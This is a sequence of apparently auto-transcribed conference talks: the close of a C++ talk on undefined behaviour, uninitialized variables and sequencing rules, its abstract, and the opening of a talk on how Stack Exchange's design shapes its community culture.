And the second on the server, I don't know, you will just reuse, most likely, you will reuse the memory location, at least then you kind of get the difference. And I'm going to repeat that. So the suggestion is that the first time you run it, you will get a garbage value of A, and then A will be at the same memory location, so the garbage value will be increased. I think that is a very good answer, and as long as you don't make an assumption of that, I think it demonstrates a deep understanding of C and C++. Well, they certainly don't get the default value here. And the question is, does it print garbage, garbage, garbage? And the answer there is, maybe? It could be initialized to zero in, hello, we will see that later, yeah? It could be initialized to C, C, and C++. It could be, yeah. Yes? But in this case, you really take a pile of garbage? No, the compiler doesn't see it. So why do you have the object of static storage duration get the default value, but with automatic storage duration, will not get? And the reason is all about execution speed. If you understand that C and C++ is all about execution speed and optimization, then you can derive a lot of these answers yourself. As long as you know approximately what happens with the variables, because static variables, they have a one-time initialization phase. In C, for example, it's quite common to put them all in the same memory space and then just do a memset of the whole area so they get to zero. Now, it's slightly more complicated in C++ because the initialization happened the first time the program counter goes through that area. So let's try to run it on my machine. This is what I get. So combining your answer and your answer gives a plausible explanation of why we get this because I'm compiling without optimization. So the compiler will try to be helpful, so it's actually resetting my stack to zero. So the garbage value happens to be zero, and combining with other insight, which was that the same garbage value will be reused and reused and thereby increased. He doesn't know this, of course. And I think that is exactly what I say there, so I'm not going to repeat that. And to have this kind of insight is very useful, but you should also know that. Since this is an example of undefined behavior, at least in theory, you could get happy birthday, and that's kind of a nice bug to have. You can also, of course, get this formatting your hard disk or launching a missile or whatever by the program that has been compiled. But the surprising fact, although I will struggle a bit to kind of prove it or to find some real examples of it, I have some anecdotes about it, though. You can also get this. By writing code that is not well-formed, you can confuse the compiler in such a way that the compiler will do bad stuff. And this is something that we kind of see because you can have a piece of code somewhere in your codebase and a piece of code somewhere completely different in the codebase, and because that one has ill-formed code, the compiler gets confused and starts producing garbage over here. So even if you never execute the code with undefined behavior, you can actually get it somewhere else in your code. And I know it was... I've never seen it myself, but I read about it, that GCC at one point, I think it was the Pragma ones when that was introduced into the language. The compiler writers of GCC, they decided, oh, we don't like Pragma ones. That's probably a Microsoft thingy. But, oh, it's unspecified behavior. 
That means we can do whatever we want. Let's fire up Nethack, I think it was, and Emacs playing Toborob Arnoy. If the compiler kind of found Pragma once, and then they just wrote the note into the manual and that's whatever we're going to do. So at least they documented it. So you can get this kind of formatting hard disk because the compiler writers want to pull your leg, but you sometimes get it because you're correcting the state of the compiler because you have undefined behavior and incorrect code. And then the quotes that you mentioned. This is what we call the nasal demons. From a quote from Kubstead C, when the compiler encounters undefined construction, it is legal for it to make demons fly out of your nose. So even for the simplest example like this, a few of the compilers actually see it. And if you generate an example, well, look, my compiler can actually show, give me a warning, then give me some time and I can come up with this equal, simple thing that the compiler will not be able to see. Yes? This very simple one, that's true. But yeah. And they are really good. And that is a good time to actually recommend in big code bases you have to start using static code analysis. And also it's a good idea to make sure that your code compiles with several compilers because they typically see different things. But we are in our code base, which is like three, four million lines of code that we have been maintaining for 20 years. We are running all the tools that we can get and we still find things that none of the tools can actually see. So a good simple trick though is to default to always compile with optimization. So instead of defaulting, compiling without optimization, compile with optimization because there are two things you get nearly for freedom. First of all, when you ask it to optimize, it needs to consider larger chunks of code together. So it's more likely that it will actually see. If you compile without optimization, it will just compile line by line and forget what happened in the previous line. With optimization, it will look at the larger context. But the most positive effect is that you get kind of strange results. And I mean, what you suggested earlier that the same garbage value will be reused, you see how it is not being reused because things are optimized in ways that you will typically get strange answers. One question about optimizing code. How is it to analyze for example a crash dump? Yeah, and that is... I hope you ship with the optimized code at least. Analyzing crash dumps, analyzing the sampler produced by optimized code is very, very difficult because the program counter is just... It's just jumping around in your code in patterns that are impossible to understand. So when you compile without optimization, you are actually also asking the compiler to create code that is so simple to follow for me as a human being. So that is a downside of compiling with optimization, of course. But the recommendation then would be default, prefer to compile with optimization and when you want to debug and you find it too difficult to understand what is actually being produced, then you switch off the optimization and go into debug mode. It's late when you get the crash dump. If you ship your code in debug mode... In the optimized mode. If you ship your code optimized and you get in some situation that you get the crash dump for, it is not possible to analyze it. I see your argument, but I do recommend that you ship CNC++ code in optimized, not debug mode. 
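As a rough illustration of that advice — the exact warning behaviour varies by compiler and version, so treat the commands in the comments as a guide rather than a guarantee:

```cpp
// Compiling with optimization makes the compiler analyze larger chunks of code,
// so warnings about uninitialized variables are more likely to fire at -O2
// than at -O0 (at least with typical GCC/Clang versions).
//
//   g++ -O2 -Wall -Wextra warn_demo.cpp    // more analysis, more likely to warn
//   g++ -O0 -Wall -Wextra warn_demo.cpp    // line-by-line compilation, often silent
#include <cstdio>

int main()
{
    int a;                  // automatic storage duration: no default value
    printf("%d\n", a);      // reads an uninitialized variable -- undefined behaviour
}
```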
But that could be different from what kind of application you are working on, of course. So now we know a few things. So I guess most of us managed to guess the plausible explanation of this code snippet. And it is because... It is because of the stack frame and the activation frame that is used by a lot of architectures. But by this example, I want to show you a typical example of the... And this is true for... It doesn't matter how much you know about anything, really. There will always be an area that you don't know well enough. So when you try to reason about something, you just come up with all these strange explanations. And when you listen to CNC++ program and try to kind of reason about certain things, it is sometimes easy to see, but yeah, of course, this is an area that he obviously do not get. He has a wrong conceptual model for it. I actually met programmers that think there is something magic happening inside when it comes to allocating variables and initializing objects. And there is no magic there. It just looks like magic if you don't know what's happening. And this is the symptom of having an invalid conceptual model. So if you believe that the Earth is the center of the universe and you see kind of the moon circling around and you see the planets and the sun circling around, and that's what you believe in, then sometimes you see things that are slightly strange, the epicycles and the deferents, and you try to come up with explanations for it rather than adjusting your conceptual model. And this is important. This is an important mode for certainly programmers. And that is to always think about, is my thinking correct here? And of course, the plausible explanation is this activation frame that I was talking about, and that is the reason why this garbage location here happens to be the same garbage, the location that this one was written into. But that is of course only true if you run with debug mode. But actually most compilers, most architectures give you a 4 to 2 if you compile it without optimization. And if you do it enough times, then you might think that's how it should work. But of course, that's just in practice and not in theory. So going back to this example, which prints 4.04, what do you think happens here if I switch it from plus plus a to a plus plus? What does it print now? And of course it prints 4.04. But I've met programmers that thinks it prints 3.33. And the first time I met programmers that thought it was 3.33, I don't know what's happening. Why do they think it's 3.33? Until I realized that the knowledge of how things are sequenced in C++ and the sequence points that we're mentioning earlier, and now it's called sequence before, etc., the rules of sequencing, is not well understood by C and C++ programmers. So therefore, while we have experience that says this will increment and print 4.04, we don't necessarily ask an industry and a group of C and C++ programmers. We don't know this well enough to really argue for why this one is updated before we are going to use it here. And that's what I'm trying to introduce a bit now. That's the rules of sequencing. So if you don't know the rules of sequencing, you are very likely that you will come up with these strange explanations. So let's do a small exercise again. Which of these prints 42? And discuss with the person next to you. Or actually, most of them prints 42. You can reduce the problem to which of them do not print 42. And if you are able to answer that question, then I think you are at least... 
you have some understanding of C++. But if you are also able to explain and kind of reason about and demonstrate, that's the reason why it will always print 42 here. Then you are demonstrating deep understanding of the programming language. Okay. The jeopardy question first. What do we think about the first one? Will it print 42 or not? Yeah, it prints 42. Does anyone want to suggest an explanation, kind of argue for why you know it's 42? Hmm? Sorry? Yeah, alright. Yeah, yeah, yeah. The 42 is, of course... No, I was more thinking about the code. Because there are separate statements, that's getting there, but it's not strong enough argument. There is a slightly stronger argument that you can make. But the semicolon is a slightly weaker argument. So I like the statement better than... separate statements, better than the semicolon argument. The order in which the statements will be executed are defined, or actually specified. Yes. So they are specified. That's close. There is actually an even closer, an even stronger argument there. This is a full expression. So it's not a sub-expression of something. And since this is a full expression, there will be, in the old terms, a sequence point after that evaluation. So you know all the side effects will have taken place. Now, if you take a full expression, you also have, and with the semicolon, you have a statement. So you were close. And that is the reason why we know this will be executed. The statements will be evaluated. And the side effect will take place before that one. That full expression is evaluated. The next one, then. Because then the semicolon argument cannot be used anymore. Does everyone agree that this is definitely 4-2? No? Do you side effects that? Does it treat first or does it compare first? At least I think it compares A and 4-2 first and then increments A. But does it treat first or does it compare first? That's your suggestion? I think it's just the same example as before. Yeah, it's the same example as plus before. Because this is an operator that doesn't introduce a sequence order. And so, therefore, you don't know in which order the sub-expressions of this full expression, this is a full expression from there to there. You don't know how the sub-expressions are going to be evaluated and when the side effects will take place. So this is undefined. What about the next one? It's defined. Why is it defined? Because there's an early out there on the table. Yeah, early out is a word that is not mentioned in the standard. But see what you mean, any other? Short circuit is not really mentioned in the standard as well. It might be in the comment in the standard. Well, I think it's because you don't have to test the operator. Yeah, and that is... It's illogical through and the reason why they have changed the rule slightly from here to here is to get the effect that you were talking about. But I haven't heard kind of the standard rule. Yeah? It will probably not execute it. It will typically not execute it. Well, the reason is that the standard says that there is a special rule for this logical and a logical or in that it guarantees a certain order of sequencing. So it basically says this expression is evaluated before that one. It says in the standard. And therefore you know that the side effect will have taken place before. In the previous standard, it talked about this one introduces a sequence point. It doesn't talk about short cutting or erling out of etc. It used the sequence point. This introduces a sequence point. 
And now it's saying that this is a sequence before that one. So that's the reason why we know it. Next one. Definitely 42. Definitely 42? Are you sure about that? Well, I guess most of us are sure about that. But at the same time, it's a bit difficult to argue for it. I've given you a few hints already. So I hope that some of you will not try to repeat those words. Why? Because there is no semicolon here. Full expression. Full expression. The reason is that this is a full expression. So after a full expression, in the old standard we said there will be a sequence point. Now we said that this full expression will be a valid before the next. Yes? Why did they remove the term sequence? The question is why did they remove this term sequence point? The reason is that in the new standard, it's also introduced concurrency. And when you have concurrent access to things, then sequence point became very, very difficult to reason about. I'm not convinced yet that I find it easier to reason about sequence points than before sequence after and things like that. But they've probably done a very good job there. So I'm learning myself to start using whencing and sequence before instead of talking about sequence points. It makes it easier to reason about concurrent codes. So we know this is 4 to 2 because this is a full expression. The next one. Undefined is the suggestion. Well defined, yeah? Yes? And actually this is sometimes called the sequence operator. So it is actually introducing a certain sequence of avalations. So with this comma operator, you're guaranteed that it will go one by one. Sorry? No, I don't think you can destroy things with overload in this case. Let's discuss that afterwards. You're already free. Usually defined, come up with it. But an overloaded operator is the function call. And as we will see later, there will be a sequence before the call. The next one, though. It returns a in both cases. It does. And that's just laziness for me. It is a full statement. And this one has also a special rule like this one. There are actually these three operators. That one, and logical and now or, and this one are mentioned specifically about this sequence order together with this sequence operator. So this, we know this is 42. What about this? Seven? 42. And the final? It is set to 41. This is undefined, but why is it undefined? It's... Yes. Which order is it evaluated? And this is something that for people that I use to audit the program languages might be a bit confusing. But in C and C++, the assignment operator is an operator. So it's just like plus or minuses or whatever. It just has an interesting side effect. You don't know whether this has been evaluated before the assignment or not. And this is... No, no. It's undefined. It could format your hard disk. It could destroy all the parts of the code. Doesn't matter what type of increment. No. Doesn't matter which type of increment. If you update a variable, if you make a side effect on a variable, you cannot read its value in the same full expression. And that's what we are doing here. We are kind of reading or writing to the value of it. So this is a classic example of undefined behavior. Can you explain why? Because first we assign after we know the right hand side. The only explanation I can give is that the standard explicitly says that you cannot have a side effect on an object and then use that object in the same expression. Then you have undefined behavior and the compiler can do whatever it wants as we will see later. One question. 
Could I write a is equal to a plus one? That will work. Yes. Because then you are not... Yeah. That will work. And that is... In some way you can say it's a special case because it's described in the standard. How it's going to work. But you are not updating the variable twice there. So this one is guaranteed to be 4 to 2 because we do have a sequence before we go into the function call. And this comma operator is something completely different from this one. Of course. So this one is fine. What about the next one? I like that answer. It depends on the implementation of foo. Because if this is a function then you are guaranteed to have a sequence point or a sequence before. But if it's a macro then you don't have that guarantee. And well, if it's an object it will also be like a function call. So you have this guarantee. But the interesting thing is that in C++11 and in C11, if this is a function call, it's easy to argue this is always defined. This will print 4 to 2. But I haven't been able to find the wording in C99 that kind of guarantees that even if this is a function call this will not be undefined behavior. And I have tried to ask several people and they are not... They think they know the answer but they have not been able to convince me yet by showing the chapter and verse in the standard and said because of that, that, that, that, that. This is definitely defined in C99. But that's the side. But the key thing is if this is a macro then you can have undefined behavior. So talking about undefined behavior, you might think it is a local thing. But it isn't as a local thing because when you compile C and C++ you typically compile each translation unit by itself and you might have this innocent looking code. But do you see what can happen here? A few months or a few years later, someone comes in and calls this method, this function, with a big seed. You have a signed integer overflow and that is explicitly in the standard sense that this is undefined behavior. And so you get the whole system is the whole program, the whole code base is undefined. So if you have this situation you can end up like this and answer is 3.1416926 blah blah blah. Anything can happen. If this applies to a 32-bit machine, if you are on a 64-bit machine you still have some bits to go on before you get the overflow. Yes? How should you write that if you want to be sure of the answer? Yes. And that is, the question is how should you write this to be sure of the answer? You have to write it yourself and you have to do all the logic to make sure that you don't get an integer overflow. And sometimes you just want to make it correct, other times you just want to get a message if it happens. And that is one of the reasons why it's so convenient to run on a virtual machine because the virtual machine can tell you. And also on a virtual machine you can just say this is true in our world. And typically on languages that run on virtual machines they don't have all this unspecified and undefined behavior that we are talking about. So, but in C and C++ you don't get this extra code to kind of save your ass. So, here is a quick exercise. What do you think this code prints? We don't have time to think too much about it, but given some experience you might have this feeling that... It will probably print true with a suggestion here. Is there anything other suggestion? Yes? It will probably print false or... Any other suggestion? Suppose that we call this function... 
So, here is a quick exercise. What do you think this code prints? We don't have time to think too much about it, but given some experience you might have a feeling. It will probably print true, is one suggestion. Any other suggestions? Yes — it will probably print false. Any other suggestions? Now suppose we call this function — I'm just building up an argument here — suppose we do something else before we call foo. You know this bool is not being initialized, so it will have a garbage value. So we just call bar first, which puts a garbage value there — and it doesn't put in 0 or 1, it puts in 2. And you know, that can happen; this is just garbage. So suppose it was 2. If I compile this with gcc — since 4.7, so for the last two years or so — gcc has given me this answer. This is real stuff; this is not something I made up. Oh, I should have mentioned: another guy blogged about this first last summer, about the behavior of 4.7. So why does this happen? Well, as always, you can go into the assembler code and have a look, and this is what happens. gcc assumes: well, bool is my type, and I refuse to accept that it can be anything but 0 or 1. So it just produces code that first checks: is it 0? It compares the register with 0, and if it isn't, it just jumps over. Then it does an xor with 1 and checks against 0 again and jumps over. This is fine if the value is 0 or 1, because then it will print the correct result. But if it's 2, neither of them will be 0, and it will print "b is true, b is false". That is what is happening in the assembler; you can look in the assembler and see it. So, going back to the example I showed you earlier with all these variations of 11, 12 and 13: if you go and look at the assembler, you will see that the different compilers use different strategies for evaluating expressions. And that is the reason — once I understood how they evaluated, I could actually construct this code snippet to show that they all gave different results. If you look at the assembler, you can get the answer directly. They don't try to be bad; they just have different strategies for doing things, and that gives you the strange results you saw earlier. So, what's wrong with this code? One answer: it's crap. Another: the standard says that this is invalid code. Another: the problem is that it's updating a variable multiple times between two semicolons. Here is a very correct one, referring to §1.9/15 in the standard, which is fine. And here is a fifth explanation of it. Now, if I'm going to judge these answers: yes, of course it's crap code, I agree 100%. "The standard says it is invalid code" — I don't like that answer; the standard never talks about invalid or valid code, it talks about well-formed and ill-formed, and basically everything that is not defined by the standard as "this is how C and C++ works" is by definition undefined behavior. "Updating multiple times between two semicolons" is certainly not correct — we have seen that before. The idea that sequence points happen at the semicolon, or that the semicolon defines what is sequenced before or after, doesn't take you very far. You have to understand full expressions and the special cases in the standard — logical AND, for example, and what happens before you call a function, and so on. This one is, yeah — it's a full expression each time it has a ++i. Is it four minutes left? Sorry — okay, sorry, I'm short of time.
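Here is a minimal reconstruction of the uninitialized-bool exercise from a moment ago — my own version, not the code from the slides. Whether you actually see both lines printed depends on the compiler, the optimization level and what happens to sit on the stack; the only guarantee the standard gives is that anything is allowed.

```cpp
#include <cstdio>

void bar()
{
    int x = 2;   // hope: leave the value 2 on the stack where b will later live
    (void)x;
}

void foo()
{
    bool b;                               // never initialized: reading it is already undefined
    if (b)  std::printf("b is true\n");
    if (!b) std::printf("b is false\n");  // a compiler that assumes bool is 0 or 1
                                          // may implement !b as (b xor 1)
}

int main()
{
    bar();
    foo();   // with b == 2, both messages can appear
    return 0;
}
```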
Yes, a quick question: how do parentheses influence the sequencing? Parentheses never introduce sequencing, because the evaluation of an expression happens in two phases — I skipped over that — but it happens in two phases, and the parentheses do not change the initial evaluation of things, so they won't affect the side effects there. But while this one is correct, and this one is correct, I like this answer the best. It shows a deep understanding of C and C++. You don't have to refer to the standard directly — I think that's fine; you can probably write correct C and C++ without knowing everything in the standard. But then you have to work on your conceptual model, your mental model of the program, all the time, and you should be able to reason about it. This is undefined behavior because the evaluation of an expression is mostly unspecified; therefore we get undefined behavior, and when we have undefined behavior, anything can happen. I think this answer demonstrates a deep understanding, and it's where we want to be if we program C and C++. So, who is releasing code with undefined behavior? I'm sure none of you do. Well, thank you — you're my friends, because I have been working with C and C++ for more than 20 years, with insurance applications, traffic control systems, seismic exploration systems, supercomputing, banking systems, and now I'm working with video conferencing and telepresence equipment. I know that all of these — shipped to the market, sold to the customers — have undefined behavior in there. I know, and it's not only me that has written it; I have been working together with colleagues. So the only thing you can hope for is to reduce the number of undefined behaviors in your code. There are some other famous examples of undefined behavior, and you might say: well, there are at least some people in the world who have mastered programming in C and C++ so well that they never introduce undefined behavior. Well, this is from the Portable C Compiler, which used to be a reference compiler for C for a while. It has been worked on for 20 years by a lot of people; it's open source, it's out there. And I compiled it with a recent compiler, and it flagged this line, which is undefined behavior, and I thought: yes — even the compiler writers get it wrong sometimes. This is probably produced by a script, though, since it's a senseless statement — but still, it is undefined behavior. So the closing argument is that since these are not really high-level languages, but more like portable assemblers, you have to understand what happens under the hood. And always work on your conceptual model, your mental model, of how this thing is working. But if you do — if you do understand what happens under the hood — then I think you have a fair chance. Thank you very much.
|
Programming is hard. Programming correct C++ is particularly hard. Indeed, it is uncommon to see a screenful containing only well defined and conforming code. Why do professional programmers write code like this? Because most programmers do not have a deep understanding of the language they are using. While they sometimes know that certain things are undefined or unspecified, they often do not know why it is so. In this talk we will study small code snippets of C++, and use them to discuss the fundamental building blocks, limitations and underlying design philosophies of this wonderful but dangerous programming language.
|
10.5446/51484 (DOI)
|
Thanks. Thank you. Let's see if, oh look, it came up. Good. I'm going to talk a little bit about Stack Exchange, the cultural anthropology of Stack Exchange. Cultural anthropology is a class that I took at university, which was the most boring thing I had to study. And my university, Yale, had the option to change classes at the last minute. So there was a period of three weeks when you could take any class you wanted, and then sort of at the end of that period you had to choose five, I think, or four or five. And accidentally I failed to withdraw from the cultural anthropology class in time and was stuck in this very boring thing learning about the Trobriand Islanders and exchanging yams. And the, I can't remember who, but there was a group of people in Canada that liked to trade blankets a lot. And I thought it was really boring. And I forced myself to take the class, and I forced myself to get a good grade in it in order to practice the surviving of very boring things. But the punchline is that it turned out that that was one of the most important things I had to learn because what I discovered is as soon as you're building systems for millions and millions of people, anthropology is actually more important than programming and object-oriented design and any of the other things that you're going to learn about in the next two days. So that's what this talk is about, is about the anthropology of the system. Last time I counted we had something around the order of 40 million monthly unique individual human beings that visited one of our websites at Stack Exchange. Either Stack Overflow is about half of the people, 20 million, and about 20 million visiting the rest of the network at StackExchange.com. And if we were a country, we would be the 34th largest country. We would be larger than Algeria and bigger than Canada, that's a good one, I guess, and some other countries there. So, you know, we would be larger than every U.S. state. And cultural anthropology is really the only tool for dealing with understanding and studying a community that's this large. We're also, the other problem is that we're kind of utopian. And by utopian, I mean that not only are we trying to study a country and understand, you know, how people work and how they think and how they behave, but we're trying to rebuild it in our own image and we're trying to make sort of a perfect utopian world on Stack Exchange for whatever that means. And we have sort of very, very high ambitions about how that culture functions and behaves. And this is, of course, radically different than anything I was taught to do as a computer scientist, as a computer programmer. When computers first came out, we were sort of lucky if we could get them to calculate things and to compute things. And indeed, I think that most programmers still spend an awful lot of time imagining that what they're doing is just trying to get some kind of a computation out of the machine in some way and that that's their job. Nobody could even imagine, sort of in the early days of computers, nobody could imagine that they could be used for communication at all and that therefore computers would become societies and cultures. This is, I learned how to program on one of these things. It was a deckwriter 3 which was connected at 300 bod or 300 bits per second which means it could print about 30 characters per second to a mainframe computer. But it wasn't really until, so sort of the early time sharing systems would print. 
The later time sharing systems used these, you know, glass terminals, CRTs. This is a digital VT100 and it was called the smart terminal. Smart meant that it had the ability to move the cursor. So, which meant that you could do an enormous number of interesting things like have a full screen text editor, a full screen interface. And the interesting thing about the arrival of the glass terminal or the CRT or whatever you want to call these things, TTYs, I guess this is a TTY. The most interesting thing about when these things arrived is that they could handle a lot more than 300 bits per second. In fact, they could go at the incredible rate of 1200 bits per second because the print head didn't have to keep up and printing technology had not been very fast in those days. And that meant that for the first time you could actually print large strings of text, large blocks of text. And that's when email was invented. And in fact, the general interface for email is what became Usenet, which was sort of the precursor, I don't know if I would call the precursor the web, but it's certainly the precursor to Stack Overflow and to sort of all online discussion, all online discussion groups in question and answer forms. And if you look at Usenet very closely, you'll see how many people actually in the audience, there's a big audience here. Wow. Have any of you, did any of you use Usenet? I mean, it's mostly obsolete but if you're a programmer, you probably use it at some point. So, a large group of you who use it. And one of the things you might have noticed about Usenet is that if you looked closely, the format of a message on Usenet was identical to an email message. It had, you know, a from and a date and so forth up at the top in a subject line. And it was originally a store and forward system that was built, wasn't really built on top of email, but it was sort of built to work in the same way as email did except that you were sending things out to groups and it replaced mailing lists as a good way to ask people questions. One of the things I noticed about Usenet, and I used this extensively in college in the 80s and this was again before the web, was that the form that Usenet conversations tended to take and the culture that evolved on Usenet was directly caused by decisions that were making, that were taken by the programmers that built Usenet. So, one of the decisions that the original Usenet software was called RN and it was sort of half command line software although it could launch you into an editor for typing. And it, the thing about RN is that when you replied to somebody else's message, by default it would copy the entire message that you were replying to into your editor and prepend every line with a little greater than sign. And that made it very easy if you wanted to to reply to the previous person's post on a point by point basis where you inserted your little pithy reply to every single sentence within, you know, sort of interleaved within the body and use that to reply. And this was a design decision that was taken because Usenet had no central server and there was no way to know that the people that are reading your reply had seen the original message. And there was no way for them to get the original message because there was no central server. And if they happened to have stored a copy of it then they knew what they were replying to. But most sites didn't have a lot of disk space and they stored about seven days worth of archives. 
So, it's very likely that you were replying to somebody and the people reading your reply would not have seen the original message and so you had to quote it. And so this decision to use the greater than signs meant that there was this form of arguing on Usenet that was very, very nitpicky where somebody would go in and insert a comment on every single line and you would say something and they would say, this is nonsense and that's clearly nonsense and this other thing is nonsense and the third thing you said is nonsense and you spelled this wrong and your grammar is terrible and how can anybody with such bad grammar be trusted to rule upon the correct interpretation of the treaty of whatever. And so these debates were completely ridiculous and silly and they were, the culture of debate was shaped by an accidental decision of the software developer that just thought, let's make the default to quote. And what this made me realize is that every time we're building computer software that's going to mediate between human beings that even the smallest decisions that we make in the architecture of those computer systems and user interface design decisions, you could, I mean, you know, by comparison, although Usenet, people would be very argumentative, another system which evolved at the same time was CompuServe. And on CompuServe, it was a central system and you could always find the original message that you were replying to and therefore, because it was stored on the central server, and therefore the reply by default did not copy the previous message and people were much more civilized. They actually did not respond with long screeds that answered every single point and turn. They responded in a far more general way. And I think what I realized then is that every time you design a software that more than one person is going to use, the decisions that you make are going to influence the society that's created on top of that software. And so that's what this talk is really about. The same thing applies in architecture. When you build a wall, it's going to influence where people stand and where they go. If you build something by accident that happens to have a nice curve to it, then kids will show up and start skateboarding there. If you build by mistake a table out of concrete and you put a little 8x8 checkered pattern on the table and some chairs next to it, then old men will show up and start playing chess. So what you build actually causes people to come and start behaving in a certain way. Sometimes it's extraordinarily intentional. It's very, you know, it's exactly what you would have expected and it's exactly what you wanted to happen. Sometimes it's completely accidental. If you've ever been to the Spanish steps in Rome, that's an example where there's sort of an accidental situation where you have two roads, one of which is much higher than the other, and they can't be connected by a road because it's too steep, so they're connected by a staircase. And that staircase is right in the center of town and it overlooks a nice piazza. And so people come and sit on the stairs, mostly backpackers and local Roman high school kids. And it's a fairly convenient place also to braid your friend's hair because you can sit on the step above them. And so all the behavior that's happening on this staircase all the time is an accidental occurrence. 
You can go there and say, look at this amazing culture that's been established of the backpackers and the high school kids and the people braiding each other's hair. But it's an accident of an architectural feature. In Times Square in New York, they tried to build the staircase, hoping to get the same thing to happen. The staircase doesn't go anywhere. It just goes up into space and then it ends. And they don't have quite as much of the people sitting on the staircase and braiding each other's hair as they do in Rome, but they probably will. When the first discussion forms when the web came out, everybody said, oh, we need a version of Usenet for the web. And the first discussion forms were created online. And these discussion forms were all sort of universally bad copies of Usenet that in most cases paid absolutely no attention whatsoever to the anthropology or the sociology of what was going on on Usenet. So these forums actually copied a lot of the mistakes and copied a lot of the bizarre accidents of the way that Usenet worked. Sometimes they even copied the ability to quote the previous message, although that went away pretty quickly because that was clearly not necessary. But a lot of times they copied the threaded model that Usenet switched to or the original model of just sort of, you always have to see everything. And the main point about this is one of the things that they copied was the fact that things appear in chronological order. And so you're having a discussion and any time you read the discussion, you're always reading it in chronological order. And this makes sense for anything but questions and answers. So we were a little bit more utopian than that in setting out to create stack exchange or stack overflow. We knew that the decisions that we made as architects of the system would create, you know, a physical infrastructure and then people would come live in that physical infrastructure and a culture and a society would develop on that infrastructure. And we had a utopian vision of making this society that meets certain kind of highfalutin goals. The goals that we had were just that people get answers to their questions. It wasn't anything particularly fancy. But we made a lot of design decisions that were based on that which sort of look like, again, anthropology. So let me talk about some of those areas that we focused on a lot in building stack overflow. And in many cases what we were doing was copied from somewhere else. And almost every case it was copied from somewhere else, whether it was Reddit or Dig or Hacker News. Those were some of the more recent ones. Stuff that we copied from Xbox, like achievements, stuff that we copied from the world of gaming. We copied the frequent flyer miles feature of airline loyalty programs. One of the things that we focused a great deal upon is the first impression that you get when you come to stack overflow or any of the 100 odd stack exchange sites that we now have. The impression that you get tells you an awful lot about what's going on. So if I put this photograph up and you look at that, I haven't told you what this is, but many of you will recognize this is the Occupy Wall Street protests. And there's a whole bunch of signals going on there. Now these are protesters, so they are intentionally sending you these signals. And we could find a whole bunch, obviously, somebody holding a sign. And you can read the words on the sign. There's a person there with a sign that says, I love the 99 percent. And that has meaning. 
She also interestingly has very expensive headphones. But I won't blame her for not thinking about that. There's a fellow there with a t-shirt that says a pada on it. He's got a, you know, it's sort of like a Palestinian keffiye, but it's kind of too brightly colored. So it's kind of, you know, funky and western. And the way his hair is organized and the way everybody is sort of presenting themselves is sending a lot of messages. Everything about this picture is telling you something about what this group of people believes in. And you immediately make a judgment as to whether you agree with that and you want to join or you disagree with that and you don't want to join. And there's all kinds of signals that will tell you whether to join or not. Almost everything you will ever read about web page design is attempting to tell you how to make the web pages friendly as possible to all people so that every human being in the world will want to come to your website. Which sounds like a great ideal, but it is not actually the ideal of Stack Overflow. We focus mostly on how to get people to go away and leave us alone. We looked at, in the early days of, and the reason it has to do with quality, of course. So when we looked at other question and answer systems while building Stack Overflow, we found a bunch that were out there. Here's one, answers.yahoo.com is absolutely enormous. And everybody thought of this as the granddaddy of all question and answer sites. And some of the questions that are on there, I suspect this is probably hard to read in this gigantic room, but I'll read them for you. What do I use to clean out my coffee maker? What is your favorite plant of all time? What are you listening to? What are you listening to? What kind of a question is that? I mean, I guess it is technically a question. There is a question mark there. What was the last thing you ate is on answers.yahoo.com on the home page? Can I die from car carbon monoxide? No. The answer is no. It's fine. Don't worry about it. Just sit there. Some of these questions, there's a clue at the bottom which is I keep forgetting to do my homework question mark. I guess you're required to put a question mark or maybe the system puts it in for you because it looks like the user put an explanation point and somebody added a question mark. I keep forgetting to do my homework. The clue is that these are children. These are kids. They're 12. And they came home from school in the afternoon and they're using their computers to entertain themselves. They are not genuinely asking questions. This is a chat room. It's not actually a Q&A site. And if you saw this and you had an important question about, you know, sort of advanced thermonuclear reactions or whatever, you would not think that this is the right place to ask it and you would leave. So this site is already, anybody that's not a teenager is already going to leave. It's already going to be pushed away by the site because it doesn't really meet their needs. Here's another one. Answers.com was the number 12 site in the world in traffic when we started. And here's some questions that are on there. What kind of attorney is needed for advice on getting someone you know committed to a mental institution? I like that question. It's useful because then you can look them up in the elevators. There was a question here that I thought was telling, what are some examples of a welcome address for JS Prom? Nobody I asked knew what a JS Prom is. 
This is obviously something that is happening in one particular school. A Prom is a school dance in America. And JS apparently means not JavaScript, but junior senior, which means the two oldest classes, the 16-year-old, 17-year-old, are having a dance at the school. And the interesting thing about this is here is a person who is asking this question who still doesn't realize that the Internet is larger than their high school. But they're on there asking this question. So once again, a site for kids, Askville by Amazon was out there. They weren't that big. There are these questions like how can I start making the right choices in my life? That's a good question. What is the 21st largest states that seems like a ridiculous question? I don't know why anybody would ask. What is the interval notation for 5x minus 4 is less than 3, 2, s? Ah! Finally a real question. And the answer is this looks like homework. We're not going to answer your homework questions. It's the only real question on the site with shutdown immediately. Meanwhile, of course, if you've been to Stack Overflow and you've looked at the home page, you see a whole bunch of programming questions. And if you don't know how to program, you have no idea what is going on and you leave, which again is what we want. SQL indexing, none, single column, multiple columns, all the keywords that you see there, Android, SQL indexing, cake, PHP, interpolation, MATLAB, multigrid, et cetera. You start seeing a whole bunch of words and if you're a programmer, you kind of get that this is a programming site and it might be for you. But if you're not a programmer, you don't even understand what language it's written in. To give you, you're all programmers so you probably think that all this kind of stuff makes sense. But if you look at one of our other sites like the Jewish Life and Learning site, which is very, very specifically for Orthodox Jews asking very specific questions about Orthodox Jewish practice, you see questions like why is the idea of Saphirot, not Shtuf, which you may not understand at all. I think probably very few of you in this room understand what that means or is it possible to have Chomets on the Shabbos directly after Pesach is an important question, but you probably don't know what Chomets or Shabbos or Pesach are. So you might leave, which is fine because you don't have the answer. Here's a statistic site, questions about GG Plot 2 and factor loadings after oblique rotation and so on and so forth. Now to be fair, these sites that I'm showing you, this is our vertical statistic site. This is our vertical Jewish site. Amazon's Askville also had a vertical site for math. And the math questions they had are what is the size of a plot in the Caribbean? I don't know what the size of a plot in the Caribbean is. Let's say 40. I don't know. That's not a question that doesn't even make sense. Okay, so here's my problem. I am 20 years old, didn't really attend high school and know only super basic math, meaning plus. So that's not even a question that we really know how to answer and it's certainly not appealing to a mathematician to answer that question. And then there's something else here which says apply for apartments online. And if you look closely, it was asked 13 hours ago and that sends a message too, right? What is a message? It's spam. Nobody cares. There's nobody here to remove spam. 13 hours have elapsed since somebody posted spam and nobody has done anything about it. 
